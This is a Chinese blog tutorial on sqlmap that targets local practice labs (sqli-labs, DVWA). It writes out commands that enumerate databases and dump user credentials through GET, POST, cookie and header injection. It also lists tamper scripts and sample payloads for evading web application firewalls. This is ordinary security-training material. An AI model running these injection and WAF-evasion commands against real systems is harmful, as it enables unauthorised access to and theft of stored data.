sql注入-sqlmap的使用方法

原創 一个蝙蝠的故事 2020-06-22 16:01

獲取一個url:
http://localhost/sqli-labs-master/Less-1/?id=1
判斷是否有注入:python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1”
get型注入
查看所有數據庫:python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1” –dbs
查看當前使用的數據庫:python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1” --current-db

在這裏插入圖片描述
查看當前用戶:python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1” --current-user

在這裏插入圖片描述

查看數據表:python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" -D security --tables
在這裏插入圖片描述

查看字段名:python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" -D security -T users --columns

在這裏插入圖片描述

查看數據:python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1” -D security -T users -C username,password --dump

在這裏插入圖片描述

post型注入

1.指定post數據:python sqlmap.py –u “http://localhost/DVWA-master/vulnerabilities/sqli/” --data “post數據”
其餘參數同get
Cookie注入
指定cookiepython sqlmap.py –u “http://localhost/DVWA-
master/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie “…cookie值”
其餘參數同get
如果不掃描cookie參數可嘗試提高等級:–level 1-5
post與cookie舉例:
語句:python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --data "id=1&Submit=Submit" cookie"security=medium;PHPSESSID=d397avpf1n2jneqsfgo0etqjl6" --current-db --batch
在這裏插入圖片描述

2.指定.txt文件:python sqlmap.py –r .txt文件
其餘參數同get
http頭部注入
-r 測速.txt文件中帶*的注入點
post與Referer舉例:
語句:python sqlmap.py -r test.txt --current-db --batch
在這裏插入圖片描述
在這裏插入圖片描述在這裏插入圖片描述

使用sqlmap進繞過waf機制

介紹
sqlmap中的tamper給我們帶來了很多防過濾的腳本,非常實用,通過自帶的tamper,或者自行編寫tamper(路徑:安裝目錄sqlmap\tamper),可以幫助我們繞過waf進行自動化攻擊
使用
指定腳本:
–tamper “腳本名”(“apostrophemask”)
例:python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1” --tamper “腳本名”
常用腳本:
apostrophemask.py:
用utf8代替引號–>(“1 AND ‘1’='1”) ‘1 AND %EF%BC%871%EF%BC%87=%EF%BC%871’
base64encode.py :
用base64編碼替換–>(“1’ AND SLEEP(5)#”)‘MScgQU5EIFNMRUVQKDUpIw==’
multiplespaces.py:
圍繞SQL關鍵字添加多個空格–>(‘1 UNION SELECT foobar’)‘1 UNION SELECT foobar’
space2plus.py:
用+替換空格–>(‘SELECT id FROM users’)‘SELECT+id+FROM+users’
nonrecursivereplacement.py:
雙重查詢語句,取代predefined SQL關鍵字with表示suitable for替代(例如 .replace(“SELECT”、”")) filters–>(‘1 UNION SELECT 2–’)‘1 UNIOUNIONN SELESELECTCT 2–’
space2randomblank.py:
代替空格字符(“”)從一個隨機的空白字符可選字符的有效集–>(‘SELECT id FROM users’)‘SELECT%0Did%0DFROM%0Ausers’
unionalltounion.py:
替換UNION ALL SELECT UNION SELECT–>(’-1 UNION ALL SELECT’)’-1 UNION SELECT’
securesphere.py:
追加特製的字符串–>(‘1 AND 1=1’)“1 AND 1=1 and ‘0having’=‘0having’”
例:
語句:python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql --dbs --batchl

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Sqlmap使用教程

原文鏈接:http://www.cnblogs.com/studyone/p/5426303.html sqlmap簡介 sqlmap支持五種不同的注入模式: 1、基於布爾的盲注,即可以根據返回頁面判斷條件真假的注入。2、基於時間

u012063507 2020-06-28 02:47:49

記一次奇妙的某個edu滲透測試

前話: 對登錄方法的輕視造成一系列的漏洞出現,對接口確實鑑權造成大量的信息泄露。從小程序到web端網址的奇妙的測試就此開始。(文章厚碼,請見諒) 1. 尋找到目標站點的小程序 進入登錄發現只需要姓名加學工號就能成功登錄,通過google

原創 2024-04-16 22:46:34

關於SQL語句中最實用的總結

前言:很多開發人員在寫代碼、開發的過程中對一些SQL語句或者程序的細節並不在意,有的人即使知道優化的寫法可能也會認爲這一點點細節不會影響程序的整體效率的。 在此我想說明:一個開發有這種想法,就說明千千萬萬個開發有這種想法,衆多細小的問題在足

原創 2021-04-10 21:09:28

手把手教你用Python輕鬆玩轉SQL注入

點擊上方“ Python爬蟲與數據挖掘 ”,進行關注 回覆“書籍”即可獲贈Python從入門到進階共10本電子書 今 日 雞 湯 山有木兮木有枝,心悅君兮君不知。 前言 大

原創 2021-03-26 21:20:06

搭建SQLo靶機與練習

SQLol安裝 實驗器材:Window 7 windows 2008 下載地址:http://github.com/SpiderLabs/MCIR 安裝流程: Window2008配置: 解壓壓縮包到網站根路徑(例如,我新建一個sql目錄,

osc_n08oztl3 2021-01-30 11:08:45

IIS 6.0 遠程代碼執行漏洞復現(cve-2017-7269)

IIS 6.0 遠程代碼執行漏洞復現(cve-2017-7269) 靶機(server2003)上的配置: 點擊添加/刪除windows組件 找到應用程序服務器,點開 選中IIS信息服務器 確定,然後就安裝了 安裝完成之後 在管理工

osc_8r37p3dx 2021-01-30 11:02:38

Web 安全滲透方面的學習路線?

照例審下題,題主說對滲透感興趣並且想真正搞 Web 滲透方面,在問題描述中提到「看了好多道哥的白帽子書和烏雲(知識庫)」,但感覺自己「瞎折騰了很久,沒啥收穫」。 這個情況其實並不是書籍或其他學習資源出了問題,而是你本身的學習路線

吳偉祥 2021-01-30 10:48:01

DC-9靶機滲透詳解

查看dc-9的mac地址 sudo arp-scan -l 找出dc-9的IP地址 sudo nmap -A -p- 10.9.11.26 掃描dc-9端口 訪問80端口 查看wappalyzer dirb http://10.9

osc_t46alvdj 2021-01-30 10:41:49

ctfhub技能樹sql注入題sqlmap工具解法

ctfhub技能樹sql注入題sqlmap工具解法 有工具爲啥還要手動注入呢 整數注入 啓用sqlmap 列出庫名 可以看到 flag在 ‘sqli’庫中 再用sqlmap列出字段 再查詢flag字段就能拿到flag了

osc_ty60k6mi 2021-01-30 10:09:43

[網絡安全提高班] 一〇一.網絡攻防溯源普及和醫療數據安全總結

當您閱讀到該篇文章時,作者已經將“網絡安全自學篇”設置成了收費專欄,首先說聲抱歉。感謝這一年來大家的閱讀和陪伴,這100篇安全文章記錄了自己從菜雞到菜鳥的成長史,該部分知識也花了很多精力去學習和總結。由於在外讀書且需要養娃,所以按最低價9.

osc_j9qcf98f 2021-01-30 09:46:20

網絡安全-sqlmap實戰之sqlilabs-Less9

目錄   類型 -dbs枚舉數據庫 --tables枚舉數據庫表 --columns枚舉列 --dump枚舉數據 查看源代碼 類型 時間盲注-單引號 -dbs枚舉數據庫 使用-o參數優化,,--technique參數指定技術,--batc

lady_killer9 2020-07-04 12:44:44

sqlmap整理

sqlmap整理sqlmap支持五種不同的注入模式:sqlmap支持的數據庫有:基本格式sqlmap -u “http://www.vuln.cn/post.php?id=1”sqlmap -u “http://www.vuln.

Empire--wisely 2020-07-02 11:21:35

suricata+bwapp靶場sqlmap實測

suricata+bwapp靶場sqlmap實測 文章目錄suricata+bwapp靶場sqlmap實測0x01 suricata的配置0x02 啓動suricata並攻擊靶場1. 啓動suricata2. 觀察3. 使用sql

One-Shell 2020-06-30 16:29:39

網絡安全-sqlmap實戰之sqlilabs-Less3

目錄 類型 注入判斷 -dbs枚舉數據庫 -tables枚舉表  -columns枚舉列 -dump枚舉數據 查看源代碼 類型 字符串轉換錯誤,他又提示輸入數字型ID,應該是把數字轉換爲了字符串 注入判斷 截圖  結合課程1,猜測sql

lady_killer9 2020-06-28 03:36:53

網絡安全-sqlmap實戰之sqlilabs-Less4

目錄 類型 -dbs枚舉數據庫 --tables枚舉數據庫表  --columns枚舉列 --dump枚舉數據 查看源代碼 類型 雙引號注入 id後“ 猜測sql語句 select * from users where id = ("

lady_killer9 2020-06-28 03:36:53